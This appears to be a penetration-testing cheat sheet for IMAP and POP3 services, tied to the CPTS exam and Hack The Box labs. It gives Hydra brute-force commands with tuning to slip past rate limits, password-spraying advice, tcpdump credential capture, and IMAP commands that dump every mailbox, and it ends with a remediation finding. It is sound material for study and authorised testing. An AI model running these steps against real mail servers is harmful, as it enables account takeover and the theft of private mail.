Field Manual

IMAP/POP3 Ports

4 min read

πŸ›‘οΈ Methodology Checklist

  • Banner grab: nc [TARGET] 143 (IMAP) or nc [TARGET] 110 (POP3)
  • Identify mail server software and version
  • Test anonymous/null auth: A1 LOGIN "" ""
  • Brute-force credentials: hydra -L users.txt -P pass.txt imap://[TARGET]
  • If authenticated: enumerate mailboxes (A1 LIST "" "*")
  • Read mails for credentials, internal info: A1 FETCH 1 BODY[]
  • Check POP3: USER [user] / PASS [pass] / LIST / RETR 1
  • Test for known mail server CVEs (SLmail, IMail, etc.)

🎯 Operational Context

Think Dumber First: Check for cleartext authentication on ports 143/110 before attempting brute-force. Capture credentials with tcpdump -i [IFACE] -w capture.pcap 'port 143 or 110' if on the same segment. IMAP login attempts don’t typically lockout β€” try top 20 common corporate passwords against discovered usernames before running full Hydra.

When you land here: Ports 143, 110, 993, or 995 open. Banner grab reveals Dovecot/Courier/Exchange IMAP. Test LOGIN then AUTHENTICATE PLAIN. If TLS required, wrap with openssl. Valid usernames from SMTP VRFY/RCPT TO are your target list.

⚑ Tactical Cheatsheet

CommandTactical Outcome
sudo nmap -sV -p110,143,993,995 -sC [TARGET_IP]Detect versions and grab SSL certificate info
openssl s_client -connect [TARGET_IP]:993Connect to IMAPS β€” view certificate and interact
openssl s_client -connect [TARGET_IP]:995Connect to POP3S β€” view certificate
curl -k 'imaps://[TARGET_IP]' --user [USER]:[PASS] -vList IMAP mailboxes with credentials
CommandTactical Outcome
A1 LOGIN [user] [pass]Authenticate
A1 LIST "" *List all folders/mailboxes
A1 SELECT INBOXEnter a folder
A1 FETCH 1:* (BODY[])Retrieve all emails
A1 FETCH 1 (BODY.PEEK[])Read email without marking as read
A1 LOGOUTClose connection
CommandTactical Outcome
USER [username]Identify user
PASS [password]Authenticate
STATGet count of saved emails
LISTList size/ID of all emails
RETR [ID]Read specific email
QUITClose connection

πŸ”¬ Deep Dive & Workflow

IMAP Commands (prefix every command with a tag e.g. A1): POP3 Commands (no tags):

Initial Enumeration

  • Nmap: sudo nmap -sV -p110,143,993,995 -sC [TARGET_IP]
  • SSL cert grab: openssl s_client -connect [TARGET_IP]:993
    • Extract O= (Organization), CN= (FQDN), emailAddress= (admin email)
    • Note software version from banner (e.g., Dovecot, InFreight POP3 v9.188)
  • If credentials found: curl -k 'imaps://[TARGET_IP]' --user [USER]:[PASS] -v

Attacks

  • Brute-force credentials if anonymous access unavailable
  • Login and A2 LIST "" * β€” search for non-standard folders (e.g., DEV.DEPARTMENT.INT)
  • Fetch all emails: A3 FETCH 1:* (BODY.PEEK[]) β€” look for SSH keys, passwords, internal data
  • Check dangerous config settings if local access: auth_debug_passwords logs cleartext passwords

Protocol Differences

  • IMAP: Manages emails directly on server. Supports folders. Server-side sync.
  • POP3: Downloads emails to client. Simple, usually only INBOX. No sync.

Ports

PortProtocolEncryption
110POP3Cleartext
143IMAPCleartext
993IMAPSSL/TLS
995POP3SSL/TLS

Certificate Intelligence (CPTS Exam)

QuestionWhere to LookExample
OrganizationO= in cert subjectInlaneFreight Ltd
FQDNCN= in cert subjectdev.inlanefreight.htb
Admin EmailemailAddress=cto@dev.inlanefreight.htb
Service VersionFirst line after connectDovecot
Flag in bannerIMAP greeting* OK ... HTB{flag}

Dangerous Config Settings

SettingRisk
auth_debugEnables auth logging β€” may leak info
auth_debug_passwordsCRITICAL β€” logs passwords in cleartext
auth_anonymous_usernameAnonymous login allowed

πŸ› οΈ Troubleshooting & Edge Cases

ProblemCauseFix
curl IMAP fails with SSL certificate errorSelf-signed cert or hostname mismatchAdd -k flag: curl -k --user [USER]:[PASS] imaps://[TARGET]/INBOX
STARTTLS upgrade rejected after EHLO/CAPABILITYServer TLS-only, no STARTTLS on 143Connect directly to port 993 (IMAPS) with openssl s_client -connect [TARGET]:993
AUTH LOGIN returns β€˜535 Authentication failed’ with valid credentialsAccount policy lockout or wrong auth mechanismTry AUTH PLAIN with base64(userpass); verify account not locked via LDAP
Telnet session drops immediately on connectService requires TLS from the first byteUse openssl s_client -connect [TARGET]:993 -quiet for IMAPS interactive session
Hydra IMAP brute-force returns all attempts as failedRate limiting or connection resetReduce threads -t 2; add delay -W 5; verify correct login format with -e ns

πŸ“ Reporting Trigger

Finding Title: Cleartext IMAP/POP3 Authentication Permitted Impact: Credentials transmitted in plaintext β€” interceptable on any shared network segment. Valid email account credentials may enable lateral movement if credentials are reused. Root Cause: Plaintext IMAP (143) and POP3 (110) ports active without STARTTLS enforcement. No TLS requirement enforced by server configuration. Recommendation: Disable plaintext ports 143 and 110. Enforce IMAPS (993) and POP3S (995) exclusively. Configure disable_plaintext_auth = yes (Dovecot) or equivalent. Implement multi-factor authentication for email access.

πŸ”— Related Nodes

Graph View

Backlinks